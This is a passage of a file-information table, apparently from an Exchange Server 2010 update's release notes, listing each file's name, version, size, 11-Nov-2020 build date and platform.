Basiccontactview.aspx| Not applicable| 3,586| 11-Nov-2020| 21:23| Not applicable
Basiccontactviewwebpart.aspx| Not applicable| 2,485| 11-Nov-2020| 21:24| Not applicable
Basiceditcalendaritem.aspx| Not applicable| 17,517| 11-Nov-2020| 21:23| Not applicable
Basiceditcontact.aspx| Not applicable| 6,356| 11-Nov-2020| 21:23| Not applicable
Basiceditmeetingresponse.aspx| Not applicable| 11,664| 11-Nov-2020| 21:23| Not applicable
Basiceditmessage.aspx| Not applicable| 8,801| 11-Nov-2020| 21:23| Not applicable
Basiceditrecurrence.aspx| Not applicable| 14,645| 11-Nov-2020| 21:23| Not applicable
Basicfoldermanagement.aspx| Not applicable| 3,630| 11-Nov-2020| 21:23| Not applicable
Basicmeetingpage.aspx| Not applicable| 12,659| 11-Nov-2020| 21:23| Not applicable
Basicmessageview.aspx| Not applicable| 4,084| 11-Nov-2020| 21:23| Not applicable
Basicmessageviewwebpart.aspx| Not applicable| 2,625| 11-Nov-2020| 21:24| Not applicable
Basicmoveitem.aspx| Not applicable| 4,112| 11-Nov-2020| 21:23| Not applicable
Basicoptions.aspx| Not applicable| 3,506| 11-Nov-2020| 21:23| Not applicable
Basicreadaddistributionlist.aspx| Not applicable| 4,364| 11-Nov-2020| 21:24| Not applicable
Basicreadadorgperson.aspx| Not applicable| 4,434| 11-Nov-2020| 21:24| Not applicable
Basicreadcontact.aspx| Not applicable| 4,406| 11-Nov-2020| 21:24| Not applicable
Basicreaddistributionlist.aspx| Not applicable| 4,864| 11-Nov-2020| 21:24| Not applicable
Basicreadmessage.aspx| Not applicable| 7,071| 11-Nov-2020| 21:24| Not applicable
Bpa.common.dll| 14.3.509.0| 226,288| 11-Nov-2020| 21:23| x86
Bpa.configcollector.dll| 14.3.509.0| 119,776| 11-Nov-2020| 21:23| x86
Bpa.networkcollector.dll| 14.3.498.0| 62,648| 11-Nov-2020| 21:23| x86
Bpa.userinterface.dll| 14.3.509.0| 529,384| 11-Nov-2020| 21:23| x86
Bpa.wizardengine.dll| 14.3.509.0| 127,968| 11-Nov-2020| 21:23| x86
Bsres.dll| 14.3.498.0| 85,448| 11-Nov-2020| 21:21| x64
C3197ef34a9e495cb17370b20389036a_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
C4f748eeabe04db79b17bab56b1285a4_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
Calcalculation.ps1| Not applicable| 31,968| 11-Nov-2020| 21:21| Not applicable
Captedt.js| Not applicable| 11,208| 11-Nov-2020| 21:20| Not applicable
Casredirect.aspx| Not applicable| 4,842| 11-Nov-2020| 21:23| Not applicable
Cb8b92743d7f42a7b8e53fe033206469_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
Checkdatabaseredundancy.ps1| Not applicable| 82,351| 11-Nov-2020| 21:21| Not applicable
Checkinvalidrecipients.ps1| Not applicable| 23,085| 11-Nov-2020| 21:21| Not applicable
Chksgfiles.dll| 14.3.498.0| 57,792| 11-Nov-2020| 21:20| x64
Citsconstants.ps1| Not applicable| 19,383| 11-Nov-2020| 21:23| Not applicable
Citslibrary.ps1| Not applicable| 171,571| 11-Nov-2020| 21:23| Not applicable
Citstypes.ps1| Not applicable| 16,668| 11-Nov-2020| 21:23| Not applicable
Clusmsg.dll| 14.3.498.0| 103,528| 11-Nov-2020| 21:23| x64
Cmmap000.bin| Not applicable| 381,737| 11-Nov-2020| 21:24| Not applicable
Cmn.js| Not applicable| 7,356| 11-Nov-2020| 21:20| Not applicable
Cobrandingdiagnostics.aspx| Not applicable| 1,649| 11-Nov-2020| 21:23| Not applicable
Collectovermetrics.ps1| Not applicable| 79,697| 11-Nov-2020| 21:21| Not applicable
Collectreplicationmetrics.ps1| Not applicable| 41,970| 11-Nov-2020| 21:21| Not applicable
Commonconnectfunctions.ps1| Not applicable| 29,707| 11-Nov-2020| 21:19| Not applicable
Configureadam.ps1| Not applicable| 23,347| 11-Nov-2020| 21:21| Not applicable
Configurenetworkprotocolparameters.ps1| Not applicable| 19,046| 11-Nov-2020| 21:21| Not applicable
Configuresmbipsec.ps1| Not applicable| 39,865| 11-Nov-2020| 21:21| Not applicable
Connectfunctions.ps1| Not applicable| 35,068| 11-Nov-2020| 21:21| Not applicable
Connect_exchangeserver_help.xml| Not applicable| 29,902| 11-Nov-2020| 21:21| Not applicable
Consoleinitialize.ps1| Not applicable| 26,381| 11-Nov-2020| 21:19| Not applicable
Convertoabvdir.ps1| Not applicable| 20,093| 11-Nov-2020| 21:21| Not applicable
Converttomessagelatency.ps1| Not applicable| 14,572| 11-Nov-2020| 21:21| Not applicable
Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Ctsvw.js| Not applicable| 1,982| 11-Nov-2020| 21:20| Not applicable
Cts_exsmime.dll| 14.3.498.0| 312,720| 11-Nov-2020| 21:19| x64
Cts_microsoft.exchange.data.common.dll| 14.3.498.0| 1,541,280| 11-Nov-2020| 21:19| x86
Cts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable
Cts_policy.14.0.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86
Cts_policy.14.1.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86
Cts_policy.14.2.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86
Cts_policy.14.3.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86
Cts_policy.8.0.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86
Cts_policy.8.1.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86
Cts_policy.8.2.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86
Cts_policy.8.3.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86
Daddrbk.js| Not applicable| 5,533| 11-Nov-2020| 21:20| Not applicable
Dagcommonlibrary.ps1| Not applicable| 49,810| 11-Nov-2020| 21:21| Not applicable
Dattach.js| Not applicable| 2,597| 11-Nov-2020| 21:20| Not applicable
Dess.dll| 8.5.3.76| 202,080| 11-Nov-2020| 21:24| x64
Devect.dll| 8.5.3.76| 1,883,488| 11-Nov-2020| 21:24| x64
Dewp.dll| 8.5.3.76| 294,240| 11-Nov-2020| 21:24| x64
Df9d06af701642c98d336e7d2e95781c_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
Diagnosticcmdletcontroller.dll| 14.3.509.0| 40,344| 11-Nov-2020| 21:20| x64
Diagnosticscriptcommonlibrary.ps1| Not applicable| 14,868| 11-Nov-2020| 21:23| Not applicable
Disableinmemorytracing.ps1| Not applicable| 13,402| 11-Nov-2020| 21:21| Not applicable
Disable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 11-Nov-2020| 21:22| Not applicable
Dsaccess.dll| 14.3.498.0| 834,968| 11-Nov-2020| 21:20| x64
Dsaccessperf.dll| 14.3.498.0| 46,480| 11-Nov-2020| 21:19| x64
Dscperf.dll| 14.3.498.0| 24,464| 11-Nov-2020| 21:19| x64
Dup_cts_microsoft.exchange.data.common.dll| 14.3.498.0| 1,541,280| 11-Nov-2020| 21:19| x86
Dup_ext_microsoft.exchange.data.transport.dll| 14.3.498.0| 328,808| 11-Nov-2020| 21:20| x86
Ecpperfcounters.xml| Not applicable| 30,668| 11-Nov-2020| 21:22| Not applicable
Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:19| x86
Edgetransport.exe| 14.3.498.0| 29,080| 11-Nov-2020| 21:22| x86
Editorstandalone.js| Not applicable| 298,514| 11-Nov-2020| 21:20| Not applicable
Edittask.aspx| Not applicable| 11,565| 11-Nov-2020| 21:23| Not applicable
Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable
Eext_policy.14.0.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86
Eext_policy.14.1.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:20| x86
Eext_policy.14.2.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86
Eext_policy.14.3.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86
Eext_policy.8.1.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:19| x86
Eext_policy.8.2.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:19| x86
Eext_policy.8.3.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:20| x86
Ef306e728a08437e80fe5a896ded4b48_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
Enableinmemorytracing.ps1| Not applicable| 13,404| 11-Nov-2020| 21:21| Not applicable
Enable_crossforestconnector.ps1| Not applicable| 18,638| 11-Nov-2020| 21:21| Not applicable
Enable_outlookcertificateauthentication.ps1| Not applicable| 28,949| 11-Nov-2020| 21:21| Not applicable
Enable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 11-Nov-2020| 21:22| Not applicable
Escprint.dll| 14.3.498.0| 21,144| 11-Nov-2020| 21:23| x64
Ese.dll| 14.3.498.0| 3,218,832| 11-Nov-2020| 21:19| x64
Eseback2.dll| 14.3.498.0| 163,728| 11-Nov-2020| 21:22| x64
Esebcli2.dll| 14.3.498.0| 111,504| 11-Nov-2020| 21:22| x64
Eseperf.dll| 14.3.498.0| 56,424| 11-Nov-2020| 21:22| x64
Eseutil.exe| 14.3.498.0| 321,424| 11-Nov-2020| 21:22| x64
Esevss.dll| 14.3.498.0| 49,560| 11-Nov-2020| 21:22| x64
Exabp.dll| 14.3.509.0| 259,480| 11-Nov-2020| 21:22| x64
Exbpa.config.xml| Not applicable| 1,152,177| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.clientaccess.xml| Not applicable| 19,829| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.global.xml| Not applicable| 20,227| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.mailbox.xml| Not applicable| 85,892| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.transport.xml| Not applicable| 27,431| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.unifiedmessaging.xml| Not applicable| 22,083| 11-Nov-2020| 21:23| Not applicable
Exbpa.e12.xml| Not applicable| 22,158| 11-Nov-2020| 21:23| Not applicable
Exbpa.esecollector.dll| 14.3.498.0| 95,400| 11-Nov-2020| 21:23| x86
Exbpa.exchangecollector.dll| 14.3.498.0| 22,480| 11-Nov-2020| 21:23| x86
Exbpa.exe| 14.3.498.0| 70,816| 11-Nov-2020| 21:20| x86
Exbpa.permissions.xml| Not applicable| 97,181| 11-Nov-2020| 21:23| Not applicable
Exbpa.prereqs.xml| Not applicable| 224,325| 11-Nov-2020| 21:23| Not applicable
Exbpa.rbac.xml| Not applicable| 43,481| 11-Nov-2020| 21:23| Not applicable
Exbpa.readiness.xml| Not applicable| 73,038| 11-Nov-2020| 21:23| Not applicable
Exbpa.shared.dll| 14.3.498.0| 124,064| 11-Nov-2020| 21:23| x86
Exbpa.stayinginformed.config.xml| Not applicable| 44,999| 11-Nov-2020| 21:21| Not applicable
Exbpa.transport.xml| Not applicable| 39,023| 11-Nov-2020| 21:23| Not applicable
Exbpacmd.exe| 14.3.498.0| 21,968| 11-Nov-2020| 21:23| x86
Exbpamdb.dll| 14.3.509.0| 17,816| 11-Nov-2020| 21:23| x64
Exbpamon.dll| 14.3.498.0| 115,608| 11-Nov-2020| 21:23| x64
Exchange.format.ps1xml| Not applicable| 265,654| 11-Nov-2020| 21:21| Not applicable
Exchange.partial.types.ps1xml| Not applicable| 21,607| 11-Nov-2020| 21:21| Not applicable
Exchange.ps1| Not applicable| 21,480| 11-Nov-2020| 21:19| Not applicable
Exchange.support.format.ps1xml| Not applicable| 25,477| 11-Nov-2020| 21:21| Not applicable
Exchange.types.ps1xml| Not applicable| 363,600| 11-Nov-2020| 21:21| Not applicable
Exchangeblog.xml| Not applicable| 120,788| 11-Nov-2020| 21:21| Not applicable
Exchmem.dll| 14.3.498.0| 64,408| 11-Nov-2020| 21:19| x64
Exchsetupmsg.dll| 14.3.498.0| 12,688| 11-Nov-2020| 21:21| x64
Exchucutil.ps1| Not applicable| 23,695| 11-Nov-2020| 21:21| Not applicable
Exdbfailureitemapi.dll| 14.3.498.0| 58,264| 11-Nov-2020| 21:22| x64
Exdbmsg.dll| 14.3.498.0| 148,376| 11-Nov-2020| 21:23| x64
Exfba.exe| 14.3.509.0| 103,816| 11-Nov-2020| 21:24| x64
Exgdsf.dll| 8.5.3.76| 16,224| 11-Nov-2020| 21:24| x64
Exhtml.dll| 8.5.3.76| 640,352| 11-Nov-2020| 21:24| x64
Exmfa.config.xml| Not applicable| 875,486| 11-Nov-2020| 21:23| Not applicable
Exmime.dll| 14.3.498.0| 332,696| 11-Nov-2020| 21:19| x64
Expiredpassword.aspx| Not applicable| 7,226| 11-Nov-2020| 21:24| Not applicable
Exportedgeconfig.ps1| Not applicable| 27,430| 11-Nov-2020| 21:21| Not applicable
Export_outlookclassification.ps1| Not applicable| 14,548| 11-Nov-2020| 21:20| Not applicable
Export_retentiontags.ps1| Not applicable| 17,080| 11-Nov-2020| 21:21| Not applicable
Exppw.dll| 14.3.498.0| 66,448| 11-Nov-2020| 21:24| x64
Exprfdll.dll| 14.3.498.0| 26,008| 11-Nov-2020| 21:20| x64
Expta.config.xml| Not applicable| 559,313| 11-Nov-2020| 21:23| Not applicable
Expta.e12.collection.xml| Not applicable| 228,414| 11-Nov-2020| 21:23| Not applicable
Exrdrlbs.dll| 14.3.498.0| 24,008| 11-Nov-2020| 21:21| x64
Exrpc32.dll| 14.3.509.0| 1,658,768| 11-Nov-2020| 21:22| x64
Exrw.dll| 14.3.498.0| 28,056| 11-Nov-2020| 21:22| x64
Exsetdata.dll| 14.3.509.0| 1,804,696| 11-Nov-2020| 21:19| x64
Exsetup.exe| 14.3.509.0| 41,968| 11-Nov-2020| 21:21| x86
Exsetupui.exe| 14.3.498.0| 254,872| 11-Nov-2020| 21:21| x86
Extra.config.xml| Not applicable| 36,393| 11-Nov-2020| 21:23| Not applicable
Extra.exe| 14.3.498.0| 123,848| 11-Nov-2020| 21:23| x86
Extrace.dll| 14.3.498.0| 163,432| 11-Nov-2020| 21:22| x64
Extraceman.config.xml| Not applicable| 89,064| 11-Nov-2020| 21:23| Not applicable
Extraceman.dll| 14.3.509.0| 62,440| 11-Nov-2020| 21:23| x86
Ext_microsoft.exchange.data.transport.dll| 14.3.498.0| 328,808| 11-Nov-2020| 21:19| x86
Exwriter.dll| 14.3.509.0| 538,008| 11-Nov-2020| 21:23| x64
Fadcnt.js| Not applicable| 5,192| 11-Nov-2020| 21:20| Not applicable
Fedtcali.js| Not applicable| 110,582| 11-Nov-2020| 21:20| Not applicable
Fedtrul.js| Not applicable| 30,339| 11-Nov-2020| 21:20| Not applicable
Fixed.skin| Not applicable| 12,879| 11-Nov-2020| 21:22| Not applicable
Flogon.js| Not applicable| 4,296| 11-Nov-2020| 21:20| Not applicable
Freadmsg.js| Not applicable| 13,127| 11-Nov-2020| 21:20| Not applicable
Galgrammargenerator.exe| 14.3.498.0| 20,888| 11-Nov-2020| 21:23| x86
Getdatabaseforsearchindex.ps1| Not applicable| 15,621| 11-Nov-2020| 21:21| Not applicable
Getsearchindexfordatabase.ps1| Not applicable| 15,545| 11-Nov-2020| 21:21| Not applicable
Getucpool.ps1| Not applicable| 19,792| 11-Nov-2020| 21:21| Not applicable
Get_antispamfilteringreport.ps1| Not applicable| 16,197| 11-Nov-2020| 21:23| Not applicable
Get_antispamsclhistogram.ps1| Not applicable| 15,043| 11-Nov-2020| 21:23| Not applicable
Get_antispamtopblockedsenderdomains.ps1| Not applicable| 16,115| 11-Nov-2020| 21:23| Not applicable
Get_antispamtopblockedsenderips.ps1| Not applicable| 15,163| 11-Nov-2020| 21:23| Not applicable
Get_antispamtopblockedsenders.ps1| Not applicable| 15,582| 11-Nov-2020| 21:23| Not applicable
Get_antispamtoprblproviders.ps1| Not applicable| 14,789| 11-Nov-2020| 21:23| Not applicable
Get_antispamtoprecipients.ps1| Not applicable| 15,194| 11-Nov-2020| 21:23| Not applicable
Get_setuplog.ps1| Not applicable| 17,406| 11-Nov-2020| 21:19| Not applicable
Get_setuplog_help.xml| Not applicable| 23,651| 11-Nov-2020| 21:21| Not applicable
Google.protocolbuffers.dll| 2.4.1.521| 325,504| 11-Nov-2020| 21:24| x86
Gradienth.png| Not applicable| 118| 11-Nov-2020| 21:20| Not applicable
Huffman_xpress.dll| 14.3.498.0| 33,176| 11-Nov-2020| 21:22| x64
Ibfpx2.dll| 8.5.3.76| 145,760| 11-Nov-2020| 21:24| x64
Ibgp42.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64
Ibjpg2.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64
Ibpcd2.dll| 8.5.3.76| 171,872| 11-Nov-2020| 21:24| x64
Ibpsd2.dll| 8.5.3.76| 42,336| 11-Nov-2020| 21:24| x64
Ibxbm2.dll| 8.5.3.76| 35,680| 11-Nov-2020| 21:24| x64
Ibxpm2.dll| 8.5.3.76| 67,936| 11-Nov-2020| 21:24| x64
Ibxwd2.dll| 8.5.3.76| 37,728| 11-Nov-2020| 21:24| x64
Im.js| Not applicable| 54,992| 11-Nov-2020| 21:20| Not applicable
Imcd32.dll| 8.5.3.76| 123,744| 11-Nov-2020| 21:24| x64
Imcd42.dll| 8.5.3.76| 142,688| 11-Nov-2020| 21:24| x64
Imcd52.dll| 8.5.3.76| 144,736| 11-Nov-2020| 21:24| x64
Imcd62.dll| 8.5.3.76| 159,072| 11-Nov-2020| 21:24| x64
Imcd72.dll| 8.5.3.76| 279,392| 11-Nov-2020| 21:24| x64
Imcd82.dll| 8.5.3.76| 279,392| 11-Nov-2020| 21:24| x64
Imcdr2.dll| 8.5.3.76| 73,056| 11-Nov-2020| 21:24| x64
Imcm52.dll| 8.5.3.76| 63,840| 11-Nov-2020| 21:24| x64
Imcm72.dll| 8.5.3.76| 117,088| 11-Nov-2020| 21:24| x64
Imcmx2.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64
Imdsf2.dll| 8.5.3.76| 168,288| 11-Nov-2020| 21:24| x64
Imfmv2.dll| 8.5.3.76| 67,424| 11-Nov-2020| 21:24| x64
Imgdf2.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64
Imgem2.dll| 8.5.3.76| 56,672| 11-Nov-2020| 21:24| x64
Imigs2.dll| 8.5.3.76| 117,088| 11-Nov-2020| 21:24| x64
Immet2.dll| 8.5.3.76| 167,264| 11-Nov-2020| 21:24| x64
Impif2.dll| 8.5.3.76| 71,008| 11-Nov-2020| 21:24| x64
Importedgeconfig.ps1| Not applicable| 79,784| 11-Nov-2020| 21:21| Not applicable
Import_retentiontags.ps1| Not applicable| 28,975| 11-Nov-2020| 21:21| Not applicable
Impsi2.dll| 8.5.3.76| 2,031,968| 11-Nov-2020| 21:24| x64
Impsz2.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64
Imps_2.dll| 8.5.3.76| 124,256| 11-Nov-2020| 21:24| x64
Imrnd2.dll| 8.5.3.76| 38,752| 11-Nov-2020| 21:24| x64
Info.aspx| Not applicable| 3,447| 11-Nov-2020| 21:23| Not applicable
Inproxy.dll| 14.3.498.0| 88,472| 11-Nov-2020| 21:19| x64
Installwindowscomponent.ps1| Not applicable| 27,225| 11-Nov-2020| 21:21| Not applicable
Install_antispamagents.ps1| Not applicable| 16,708| 11-Nov-2020| 21:23| Not applicable
Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 119,712| 11-Nov-2020| 21:25| Not applicable
Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 20,384| 11-Nov-2020| 21:25| Not applicable
Interop.certenroll.dll| 14.3.498.0| 148,384| 11-Nov-2020| 21:23| x64
Interop.migbase.dll| 14.3.509.0| 50,152| 11-Nov-2020| 21:20| x86
Interop.netfw.dll| 14.3.498.0| 41,880| 11-Nov-2020| 21:20| x86
Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 26,016| 11-Nov-2020| 21:25| Not applicable
Interop.wuapilib.dll| 14.3.498.0| 70,552| 11-Nov-2020| 21:25| x86
Interop.xenroll.dll| 14.3.498.0| 50,072| 11-Nov-2020| 21:20| x64
Iphgw2.dll| 8.5.3.76| 222,048| 11-Nov-2020| 21:24| x64
Isgdi32.dll| 8.5.3.76| 1,406,312| 11-Nov-2020| 21:24| x64
Isinteg.exe| 14.3.509.0| 449,432| 11-Nov-2020| 21:23| x64
Kerbauth.dll| 14.3.498.0| 62,352| 11-Nov-2020| 21:22| x64
Languageselection.aspx| Not applicable| 5,421| 11-Nov-2020| 21:23| Not applicable
Largetoken_iis_ews.ps1| Not applicable| 21,795| 11-Nov-2020| 21:21| Not applicable
Largetoken_kerberos.ps1| Not applicable| 16,042| 11-Nov-2020| 21:21| Not applicable
Logoff.aspx| Not applicable| 6,067| 11-Nov-2020| 21:24| Not applicable
Logon.aspx| Not applicable| 13,479| 11-Nov-2020| 21:24| Not applicable
Lpsetupui.exe| 14.3.498.0| 234,400| 11-Nov-2020| 21:21| x86
Lpversioning.xml| Not applicable| 18,977| 11-Nov-2020| 21:21| Not applicable
Mad.exe| 14.3.509.0| 1,364,360| 11-Nov-2020| 21:19| x64
Madmsg.dll| 14.3.498.0| 101,272| 11-Nov-2020| 21:19| x64
Mailboxdatabasereseedusingspares.ps1| Not applicable| 40,993| 11-Nov-2020| 21:21| Not applicable
Managescheduledtask.ps1| Not applicable| 36,869| 11-Nov-2020| 21:21| Not applicable
Mapiprotocolhandlerstub.dll| 14.3.498.0| 74,640| 11-Nov-2020| 21:22| x64
Mdbevent.dll| 14.3.509.0| 492,944| 11-Nov-2020| 21:23| x64
Mdbmsg.dll| 14.3.498.0| 224,712| 11-Nov-2020| 21:20| x64
Mdbperf.dll| 14.3.509.0| 468,376| 11-Nov-2020| 21:25| x64
Mdbperf.ini| Not applicable| 724,818| 11-Nov-2020| 21:20| Not applicable
Mdbperfx.dll| 14.3.509.0| 468,888| 11-Nov-2020| 21:25| x64
Mdbrest.dll| 14.3.509.0| 697,752| 11-Nov-2020| 21:23| x64
Mdbsz.dll| 14.3.509.0| 49,560| 11-Nov-2020| 21:23| x64
Mdbtask.dll| 14.3.509.0| 448,408| 11-Nov-2020| 21:23| x64
Meetingpage.aspx| Not applicable| 12,927| 11-Nov-2020| 21:23| Not applicable
Messages.xsd| Not applicable| 21,147| 11-Nov-2020| 21:24| Not applicable
Microsoft.dkm.proxy.dll| 14.3.498.0| 38,048| 11-Nov-2020| 21:22| x86
Microsoft.exchange.abproviders.ad.dll| 14.3.498.0| 41,936| 11-Nov-2020| 21:20| x86
Microsoft.exchange.addressbook.service.eventlog.dll| 14.3.498.0| 13,928| 11-Nov-2020| 21:20| x64
Microsoft.exchange.addressbook.service.exe| 14.3.498.0| 148,584| 11-Nov-2020| 21:20| x86
Microsoft.exchange.airsync.airsyncmsg.dll| 14.3.498.0| 42,384| 11-Nov-2020| 21:22| x64
Microsoft.exchange.airsync.dll1| 14.3.509.0| 1,176,552| 11-Nov-2020| 21:19| Not applicable
Microsoft.exchange.airsynchandler.dll| 14.3.498.0| 62,648| 11-Nov-2020| 21:19| x86
Microsoft.exchange.antispam.eventlog.dll| 14.3.498.0| 20,120| 11-Nov-2020| 21:20| x64
Microsoft.exchange.antispamupdate.eventlog.dll| 14.3.498.0| 14,736| 11-Nov-2020| 21:25| x64
Microsoft.exchange.antispamupdatesvc.exe| 14.3.498.0| 37,792| 11-Nov-2020| 21:20| x86
Microsoft.exchange.approval.applications.dll| 14.3.498.0| 62,408| 11-Nov-2020| 21:20| x86
Microsoft.exchange.assistants.dll| 14.3.498.0| 226,488| 11-Nov-2020| 21:20| x86
Microsoft.exchange.assistants.eventlog.dll| 14.3.498.0| 22,416| 11-Nov-2020| 21:20| x64
Microsoft.exchange.auditlogsearch.eventlog.dll| 14.3.498.0| 12,736| 11-Nov-2020| 21:21| x64
Microsoft.exchange.auditlogsearchservicelet.dll| 14.3.498.0| 58,504| 11-Nov-2020| 21:21| x86
Microsoft.exchange.authorizationplugin.dll| 14.3.509.0| 71,664| 11-Nov-2020| 21:22| x64
Microsoft.exchange.authservicehostservicelet.dll| 14.3.498.0| 15,984| 11-Nov-2020| 21:21| x86
Microsoft.exchange.autodiscover.dll| 14.3.509.0| 275,440| 11-Nov-2020| 21:20| x86
Microsoft.exchange.autodiscover.eventlogs.dll| 14.3.498.0| 20,376| 11-Nov-2020| 21:20| x64
Microsoft.exchange.cabutility.dll| 14.3.498.0| 257,664| 11-Nov-2020| 21:19| x64
Microsoft.exchange.certificatedeployment.eventlog.dll| 14.3.498.0| 15,304| 11-Nov-2020| 21:21| x64
Microsoft.exchange.certificatedeploymentservicelet.dll| 14.3.498.0| 33,904| 11-Nov-2020| 21:21| x86
Microsoft.exchange.clients.common.dll| 14.3.498.0| 54,432| 11-Nov-2020| 21:24| x86
Microsoft.exchange.clients.eventlogs.dll| 14.3.498.0| 75,672| 11-Nov-2020| 21:24| x64
Microsoft.exchange.clients.owa.dll| 14.3.509.0| 3,314,672| 11-Nov-2020| 21:20| x86
Microsoft.exchange.clients.security.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:20| x86
Microsoft.exchange.clients.strings.dll| 14.3.498.0| 959,440| 11-Nov-2020| 21:20| x86
Microsoft.exchange.cluster.replay.dll| 14.3.509.0| 1,962,992| 11-Nov-2020| 21:20| x86
Microsoft.exchange.cluster.replicaseeder.dll| 14.3.498.0| 94,160| 11-Nov-2020| 21:23| x64
Microsoft.exchange.cluster.replicavsswriter.dll| 14.3.509.0| 177,640| 11-Nov-2020| 21:23| x64
Microsoft.exchange.common.dll| 14.3.498.0| 103,584| 11-Nov-2020| 21:19| x86
Microsoft.exchange.common.il.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:22| x64
Microsoft.exchange.common.processmanagermsg.dll| 14.3.498.0| 17,304| 11-Nov-2020| 21:22| x64
Microsoft.exchange.commonmsg.dll| 14.3.498.0| 22,120| 11-Nov-2020| 21:19| x64
Microsoft.exchange.compliance.dll| 14.3.509.0| 50,160| 11-Nov-2020| 21:22| x86
Microsoft.exchange.configuration.certificateauth.dll| 14.3.498.0| 50,336| 11-Nov-2020| 21:22| x86
Microsoft.exchange.configuration.delegatedauth.dll| 14.3.509.0| 54,256| 11-Nov-2020| 21:22| x86
Microsoft.exchange.configuration.objectmodel.dll| 14.3.509.0| 1,045,488| 11-Nov-2020| 21:19| x86
Microsoft.exchange.configuration.objectmodel.eventlog.dll| 14.3.498.0| 29,080| 11-Nov-2020| 21:19| x64
Microsoft.exchange.configuration.redirectionmodule.dll| 14.3.498.0| 83,104| 11-Nov-2020| 21:22| x86
Microsoft.exchange.contentfilter.wrapper.exe| 14.3.498.0| 175,048| 11-Nov-2020| 21:23| x64
Microsoft.exchange.core.strings.dll| 14.3.498.0| 156,624| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.applicationlogic.dll| 14.3.509.0| 422,880| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.applicationlogic.eventlog.dll| 14.3.498.0| 14,224| 11-Nov-2020| 21:19| x64
Microsoft.exchange.data.directory.dll| 14.3.498.0| 3,462,304| 11-Nov-2020| 21:22| x86
